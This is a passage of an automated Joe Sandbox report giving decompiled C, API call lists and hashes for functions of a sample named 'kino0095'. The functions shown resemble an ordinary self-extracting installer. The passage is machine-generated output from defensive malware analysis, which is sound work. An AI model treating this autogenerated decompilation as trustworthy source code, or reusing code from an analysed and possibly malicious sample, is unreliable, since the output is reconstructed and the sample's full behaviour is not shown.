                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121E571B40206BBDB705AA5ACD9FFF76FCEB85B50F100429FA82E6185D77A8401C761
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B6CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                    0x010b6cf7
                                                                                                                                                                                                                                    0x010b6d00
                                                                                                                                                                                                                                    0x010b6d19

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010B6E26,010B1000), ref: 010B6CF7
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(010B6E26,?,010B6E26,010B1000), ref: 010B6D00
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,010B6E26,010B1000), ref: 010B6D0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,010B6E26,010B1000), ref: 010B6D12
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: b848ec611dd8b94c04b18ae560ecac8726410280d7f7caaea153f05878511306
                                                                                                                                                                                                                                    • Instruction ID: efb039b1c930456ab4363c3ce1f53d358158e9830560f5dd5706ef76cd90f68e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b848ec611dd8b94c04b18ae560ecac8726410280d7f7caaea153f05878511306
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3D0C972200108FBDBA12BE1E84CA993F2CEB48292F444800F35983004CA3B48518B51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                                    			E010B3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E010B43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x10b9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10b91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E010B44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x10b91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x10b91e5 - 3;
						if(_t49 - 0x10b91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x10b91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x10b91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E010B658A(0x10b91e4, 0x104, 0x10b1140);
								_t27 = E010B58C8(0x10b91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x10b91e4 - 0x5c;
									if( *0x10b91e4 != 0x5c) {
										L30:
										_t30 = E010B597D(0x10b91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x10b91e5 - 0x5c;
									if( *0x10b91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E010B44B9(_t64, 0x54a, 0x10b91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x10b91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x10b91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x10b91e4 - 0x5c;
						if( *0x10b91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x10b9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x10b9a3c, 0x3e8, 0x10b8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E010B4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10b87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E010B44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                    0x010b321b
                                                                                                                                                                                                                                    0x010b321e
                                                                                                                                                                                                                                    0x010b3221
                                                                                                                                                                                                                                    0x010b343c
                                                                                                                                                                                                                                    0x010b343e
                                                                                                                                                                                                                                    0x010b343f
                                                                                                                                                                                                                                    0x010b3445
                                                                                                                                                                                                                                    0x010b3447
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3447
                                                                                                                                                                                                                                    0x010b3229
                                                                                                                                                                                                                                    0x010b322a
                                                                                                                                                                                                                                    0x010b322f
                                                                                                                                                                                                                                    0x010b33ec
                                                                                                                                                                                                                                    0x010b33f7
                                                                                                                                                                                                                                    0x010b3410
                                                                                                                                                                                                                                    0x010b3416
                                                                                                                                                                                                                                    0x010b341d
                                                                                                                                                                                                                                    0x010b342d
                                                                                                                                                                                                                                    0x010b342d
                                                                                                                                                                                                                                    0x010b3438
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3438
                                                                                                                                                                                                                                    0x010b3237
                                                                                                                                                                                                                                    0x010b3243
                                                                                                                                                                                                                                    0x010b3243
                                                                                                                                                                                                                                    0x010b3246
                                                                                                                                                                                                                                    0x010b32ee
                                                                                                                                                                                                                                    0x010b32f4
                                                                                                                                                                                                                                    0x010b32f6
                                                                                                                                                                                                                                    0x010b33d4
                                                                                                                                                                                                                                    0x010b33d6
                                                                                                                                                                                                                                    0x010b33db
                                                                                                                                                                                                                                    0x010b33dc
                                                                                                                                                                                                                                    0x010b33de
                                                                                                                                                                                                                                    0x010b33df
                                                                                                                                                                                                                                    0x010b3370
                                                                                                                                                                                                                                    0x010b3372
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3372
                                                                                                                                                                                                                                    0x010b32fc
                                                                                                                                                                                                                                    0x010b3301
                                                                                                                                                                                                                                    0x010b3301
                                                                                                                                                                                                                                    0x010b3303
                                                                                                                                                                                                                                    0x010b3304
                                                                                                                                                                                                                                    0x010b3304
                                                                                                                                                                                                                                    0x010b330a
                                                                                                                                                                                                                                    0x010b330d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3313
                                                                                                                                                                                                                                    0x010b3318
                                                                                                                                                                                                                                    0x010b331a
                                                                                                                                                                                                                                    0x010b3331
                                                                                                                                                                                                                                    0x010b3332
                                                                                                                                                                                                                                    0x010b333a
                                                                                                                                                                                                                                    0x010b333d
                                                                                                                                                                                                                                    0x010b337c
                                                                                                                                                                                                                                    0x010b3388
                                                                                                                                                                                                                                    0x010b338f
                                                                                                                                                                                                                                    0x010b3394
                                                                                                                                                                                                                                    0x010b3396
                                                                                                                                                                                                                                    0x010b33a4
                                                                                                                                                                                                                                    0x010b33ab
                                                                                                                                                                                                                                    0x010b33b6
                                                                                                                                                                                                                                    0x010b33be
                                                                                                                                                                                                                                    0x010b33c3
                                                                                                                                                                                                                                    0x010b33c5
                                                                                                                                                                                                                                    0x010b3435
                                                                                                                                                                                                                                    0x010b3437
                                                                                                                                                                                                                                    0x010b3437
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3437
                                                                                                                                                                                                                                    0x010b33c7
                                                                                                                                                                                                                                    0x010b33c9
                                                                                                                                                                                                                                    0x010b33cc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b33cc
                                                                                                                                                                                                                                    0x010b33ad
                                                                                                                                                                                                                                    0x010b33b4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b33b4
                                                                                                                                                                                                                                    0x010b3398
                                                                                                                                                                                                                                    0x010b3399
                                                                                                                                                                                                                                    0x010b339b
                                                                                                                                                                                                                                    0x010b339c
                                                                                                                                                                                                                                    0x010b339d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b339d
                                                                                                                                                                                                                                    0x010b334c
                                                                                                                                                                                                                                    0x010b3351
                                                                                                                                                                                                                                    0x010b3354
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b335c
                                                                                                                                                                                                                                    0x010b3362
                                                                                                                                                                                                                                    0x010b3364
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3366
                                                                                                                                                                                                                                    0x010b3367
                                                                                                                                                                                                                                    0x010b3369
                                                                                                                                                                                                                                    0x010b336a
                                                                                                                                                                                                                                    0x010b336b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b336b
                                                                                                                                                                                                                                    0x010b331c
                                                                                                                                                                                                                                    0x010b3323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3329
                                                                                                                                                                                                                                    0x010b332b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b332b
                                                                                                                                                                                                                                    0x010b324c
                                                                                                                                                                                                                                    0x010b324c
                                                                                                                                                                                                                                    0x010b324f
                                                                                                                                                                                                                                    0x010b32c8
                                                                                                                                                                                                                                    0x010b32ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b32ce
                                                                                                                                                                                                                                    0x010b3251
                                                                                                                                                                                                                                    0x010b3256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3271
                                                                                                                                                                                                                                    0x010b3277
                                                                                                                                                                                                                                    0x010b3279
                                                                                                                                                                                                                                    0x010b3298
                                                                                                                                                                                                                                    0x010b329d
                                                                                                                                                                                                                                    0x010b329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b32b0
                                                                                                                                                                                                                                    0x010b32b6
                                                                                                                                                                                                                                    0x010b32b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b32be
                                                                                                                                                                                                                                    0x010b3280
                                                                                                                                                                                                                                    0x010b3289
                                                                                                                                                                                                                                    0x010b328e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b328e
                                                                                                                                                                                                                                    0x010b327b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b327b
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,010B8598,00000200), ref: 010B3271
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B33E2
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 010B33F7
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010B3410
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 010B3426
                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 010B342D
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 010B343F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$doza2
                                                                                                                                                                                                                                    • API String ID: 2418873061-44923337
                                                                                                                                                                                                                                    • Opcode ID: 87b748583cf2e8783afa97150ee1b7301e64a892357f5e5cd0ab68ab84cb8591
                                                                                                                                                                                                                                    • Instruction ID: 4ee44f626569541bbf0676c83b2918006a578d36290530ac1de246bf04c65b82
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b748583cf2e8783afa97150ee1b7301e64a892357f5e5cd0ab68ab84cb8591
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6551F670381240B6EBB25A395CCCFFB2D98FB45B54F208428F6C5AA2C5CFAD94019364
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E010B2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x10b8004; // 0x72151d89
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x10b9a3c = __ecx;
				memset(0x10b9140, 0, 0x8fc);
				memset(0x10b8a20, 0, 0x32c);
				memset(0x10b88c0, 0, 0x104);
				 *0x10b93ec = 1;
				_t20 = E010B468F("TITLE", 0x10b9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x10b858c = _t27;
					SetEvent(_t27);
					_t64 = 0x10b9a34;
					if(E010B468F("EXTRACTOPT", 0x10b9a34, 4) != 0) {
						if(( *0x10b9a34 & 0x000000c0) == 0) {
							L12:
							 *0x10b9120 =  *0x10b9120 & _t65;
							if(E010B5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x10b8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x10b8184 != 0) {
										__imp__#17();
									}
									if( *0x10b8a24 == 0) {
										_t57 = _t65;
										if(E010B36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x10b9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x10b9a34 & 0x00000100) == 0 || ( *0x10b8a38 & 0x00000001) != 0 || E010B18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E010B6517(_t57, 0x7d6, _t34, E010B19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E010B2390(0x10b8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E010B44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E010B468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x10b8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x10b9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E010B44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E010B44B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x10b8588);
										 *0x10b9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x10b9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E010B6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                    0x010b2cb5
                                                                                                                                                                                                                                    0x010b2cbc
                                                                                                                                                                                                                                    0x010b2cc7
                                                                                                                                                                                                                                    0x010b2cc9
                                                                                                                                                                                                                                    0x010b2cd1
                                                                                                                                                                                                                                    0x010b2cd3
                                                                                                                                                                                                                                    0x010b2cd9
                                                                                                                                                                                                                                    0x010b2ce9
                                                                                                                                                                                                                                    0x010b2cf9
                                                                                                                                                                                                                                    0x010b2d0e
                                                                                                                                                                                                                                    0x010b2d15
                                                                                                                                                                                                                                    0x010b2d1c
                                                                                                                                                                                                                                    0x010b2ef3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2d2d
                                                                                                                                                                                                                                    0x010b2d34
                                                                                                                                                                                                                                    0x010b2d3b
                                                                                                                                                                                                                                    0x010b2d40
                                                                                                                                                                                                                                    0x010b2d48
                                                                                                                                                                                                                                    0x010b2d59
                                                                                                                                                                                                                                    0x010b2d84
                                                                                                                                                                                                                                    0x010b2e1f
                                                                                                                                                                                                                                    0x010b2e1f
                                                                                                                                                                                                                                    0x010b2e2e
                                                                                                                                                                                                                                    0x010b2e41
                                                                                                                                                                                                                                    0x010b2e5a
                                                                                                                                                                                                                                    0x010b2e62
                                                                                                                                                                                                                                    0x010b2e6c
                                                                                                                                                                                                                                    0x010b2e6c
                                                                                                                                                                                                                                    0x010b2e75
                                                                                                                                                                                                                                    0x010b2e77
                                                                                                                                                                                                                                    0x010b2e77
                                                                                                                                                                                                                                    0x010b2e84
                                                                                                                                                                                                                                    0x010b2e8b
                                                                                                                                                                                                                                    0x010b2e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2e96
                                                                                                                                                                                                                                    0x010b2e96
                                                                                                                                                                                                                                    0x010b2e9e
                                                                                                                                                                                                                                    0x010b2ea2
                                                                                                                                                                                                                                    0x010b2eba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2ece
                                                                                                                                                                                                                                    0x010b2ede
                                                                                                                                                                                                                                    0x010b2eed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2eed
                                                                                                                                                                                                                                    0x010b2eef
                                                                                                                                                                                                                                    0x010b2eef
                                                                                                                                                                                                                                    0x010b2eef
                                                                                                                                                                                                                                    0x010b2eef
                                                                                                                                                                                                                                    0x010b2ea2
                                                                                                                                                                                                                                    0x010b2e86
                                                                                                                                                                                                                                    0x010b2e88
                                                                                                                                                                                                                                    0x010b2e88
                                                                                                                                                                                                                                    0x010b2e43
                                                                                                                                                                                                                                    0x010b2e48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2e48
                                                                                                                                                                                                                                    0x010b2e30
                                                                                                                                                                                                                                    0x010b2e30
                                                                                                                                                                                                                                    0x010b2ef8
                                                                                                                                                                                                                                    0x010b2f01
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2f01
                                                                                                                                                                                                                                    0x010b2d8a
                                                                                                                                                                                                                                    0x010b2d8f
                                                                                                                                                                                                                                    0x010b2da1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2da3
                                                                                                                                                                                                                                    0x010b2dae
                                                                                                                                                                                                                                    0x010b2db4
                                                                                                                                                                                                                                    0x010b2dbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2dca
                                                                                                                                                                                                                                    0x010b2dd3
                                                                                                                                                                                                                                    0x010b2df5
                                                                                                                                                                                                                                    0x010b2e02
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2dd5
                                                                                                                                                                                                                                    0x010b2dde
                                                                                                                                                                                                                                    0x010b2de3
                                                                                                                                                                                                                                    0x010b2e04
                                                                                                                                                                                                                                    0x010b2e0a
                                                                                                                                                                                                                                    0x010b2e10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2e10
                                                                                                                                                                                                                                    0x010b2dd3
                                                                                                                                                                                                                                    0x010b2dbb
                                                                                                                                                                                                                                    0x010b2da1
                                                                                                                                                                                                                                    0x010b2d5b
                                                                                                                                                                                                                                    0x010b2d5b
                                                                                                                                                                                                                                    0x010b2d5d
                                                                                                                                                                                                                                    0x010b2d69
                                                                                                                                                                                                                                    0x010b2d6e
                                                                                                                                                                                                                                    0x010b2f06
                                                                                                                                                                                                                                    0x010b2f06
                                                                                                                                                                                                                                    0x010b2f06
                                                                                                                                                                                                                                    0x010b2d59
                                                                                                                                                                                                                                    0x010b2f18

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B2CD9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B2CE9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B2CF9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2D34
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2D40
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2DAE
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010B2DBD
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2E0A
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
                                                                                                                                                                                                                                    • API String ID: 1002816675-859929227
                                                                                                                                                                                                                                    • Opcode ID: 493b7aac79ae8acf712a83d6dc6c589515ddce87efd101e4225a4b49f058a1d7
                                                                                                                                                                                                                                    • Instruction ID: 89f42b601aaa5b560a9d11d7c55a93b0137055ebb010269a6f91f4fb8a037ff0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 493b7aac79ae8acf712a83d6dc6c589515ddce87efd101e4225a4b49f058a1d7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F510AB0300301AAF7B06B299CC9BFB36DCEB55704F004469F6D2DA1D9DBB9A841C725
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 81%
